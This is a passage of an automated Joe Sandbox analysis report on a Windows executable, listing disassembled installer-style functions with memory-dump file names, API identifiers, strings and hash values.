                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsCreateDeviceFontIndirectwsprintf
                                                                                                                            • String ID: H$Z
                                                                                                                            • API String ID: 1586071882-4221459494
                                                                                                                            • Opcode ID: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
                                                                                                                            • Instruction ID: fe53f9027c55cc81bf00ecbd586396b11bfc2b5e7faefd45710aa59a0b9b721a
                                                                                                                            • Opcode Fuzzy Hash: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
                                                                                                                            • Instruction Fuzzy Hash: AC218CB29092009FD310BF68DD446AABBF8FB89304F04C97EE088E3251C3B84555CB6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040395E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 44timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: TextTimerWindowwsprintf
                                                                                                                            • String ID: 8_o$unpacking data: %d%%$verifying installer: %d%%
                                                                                                                            • API String ID: 2438957755-4028837044
                                                                                                                            • Opcode ID: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                            • Instruction ID: 5883a2093b31581e9909bbd4cee83827143d54294f5a20fab69da977af55eaa0
                                                                                                                            • Opcode Fuzzy Hash: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                            • Instruction Fuzzy Hash: D9015EB0908304AFD710AF24D48525EBFE8EB48355F50C83EE58997281C7B895859B8A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406557 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                            • String ID: f
                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                            • Opcode ID: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                            • Instruction ID: 922df396bf3e7088f2107368fcd68d656d94b82640ce54d584134d1287f84c7b
                                                                                                                            • Opcode Fuzzy Hash: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                            • Instruction Fuzzy Hash: 1E2117B0804308EFDB10AFA9D88829EBFF4EF84314F00C91EE99557281D7B98459CF96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404C0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OleInitialize.OLE32(006F5F38), ref: 00404C28
                                                                                                                              • Part of subcall function 00404BD7: SendMessageA.USER32 ref: 00404C00
                                                                                                                            • OleUninitialize.OLE32(00000000,00000000,?,?,0040651F), ref: 00404C82
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                                                            • String ID: $ao
                                                                                                                            • API String ID: 2896919175-1642991873
                                                                                                                            • Opcode ID: cc3d3faee6e08fca0d7ac6085a90d3f2df43109a1ff026cd60c170983ae485cb
                                                                                                                            • Instruction ID: 75bd5999431369d77bbf521c9437c267996017c7344dffd01c2583dab3973ae7
                                                                                                                            • Opcode Fuzzy Hash: cc3d3faee6e08fca0d7ac6085a90d3f2df43109a1ff026cd60c170983ae485cb
                                                                                                                            • Instruction Fuzzy Hash: BA01D4F150C200AFE350AF69D844B66BBFCEB84310F41847EEBC5A3390DB38A44187A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%